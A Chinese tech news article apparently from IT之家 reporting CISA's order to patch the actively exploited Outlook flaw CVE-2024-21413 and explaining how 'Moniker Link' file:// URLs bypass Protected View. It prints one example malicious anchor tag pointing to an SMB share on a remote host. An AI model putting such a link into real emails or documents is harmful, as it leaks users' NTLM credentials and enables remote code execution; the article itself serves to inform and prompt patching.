設(shè)置
  • 日夜間
    隨系統(tǒng)
    淺色
    深色
  • 主題色

微軟 Outlook 被曝高危漏洞,可繞過保護視圖遠程執(zhí)行任意代碼

2025/2/7 9:50:10 來源:IT之家 作者:故淵 責(zé)編:故淵

IT之家 2 月 7 日消息,美國網(wǎng)絡(luò)安全和基礎(chǔ)設(shè)施安全局(CISA)本周四發(fā)布公告,要求美國聯(lián)邦機構(gòu)在 3 周內(nèi)(2 月 27 日前)為其系統(tǒng)部署補丁,修復(fù)微軟 Outlook 高危遠程代碼執(zhí)行漏洞。

該漏洞由來自網(wǎng)絡(luò)安全公司 Check Point Research 的安全專家 Haifei Li 率先發(fā)現(xiàn),追蹤編號為 CVE-2024-21413。

CISA 表示目前已經(jīng)有證據(jù)表明,有黑客利用該漏洞發(fā)起攻擊。攻擊者可以繞過保護視圖(該視圖應(yīng)以只讀模式打開 Office 文件以阻止嵌入其中的有害內(nèi)容),并以編輯模式打開惡意 Office 文件,從而獲得遠程代碼執(zhí)行能力。

攻擊者利用名為“Moniker Link”的安全方式,繞過 Outlook 內(nèi)置的惡意鏈接保護,使用 file:// 協(xié)議,并在指向攻擊者控制服務(wù)器的 URL 中添加感嘆號和隨機文本(例如 "!something"),嵌入到電子郵件中。

IT之家附上示例如下:

*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

CVE-2024-21413 影響多個 Office 產(chǎn)品,包括 Microsoft Office LTSC 2021、Microsoft 365 Apps for Enterprise、Microsoft Outlook 2016 和 Microsoft Office 2019。

黑客成功攻擊后,可以竊取 NTLM 憑據(jù),以及通過惡意制作的 Office 文檔執(zhí)行任意代碼。CISA 已將此漏洞添加到其已知被利用漏洞 (KEV) 目錄中,并將其標記為正在被積極利用。

CISA 強調(diào),這類漏洞是惡意網(wǎng)絡(luò)行為者常用的攻擊途徑,對聯(lián)邦企業(yè)構(gòu)成重大風(fēng)險。雖然 CISA 主要關(guān)注提醒聯(lián)邦機構(gòu)盡快修補漏洞,但也建議私營機構(gòu)優(yōu)先修補這些漏洞,以阻止正在進行的攻擊。

廣告聲明:文內(nèi)含有的對外跳轉(zhuǎn)鏈接(包括不限于超鏈接、二維碼、口令等形式),用于傳遞更多信息,節(jié)省甄選時間,結(jié)果僅供參考,IT之家所有文章均包含本聲明。

相關(guān)文章

關(guān)鍵詞:Outlook,微軟

軟媒旗下網(wǎng)站: IT之家 最會買 - 返利返現(xiàn)優(yōu)惠券 iPhone之家 Win7之家 Win10之家 Win11之家

軟媒旗下軟件: 軟媒手機APP應(yīng)用 魔方 最會買 要知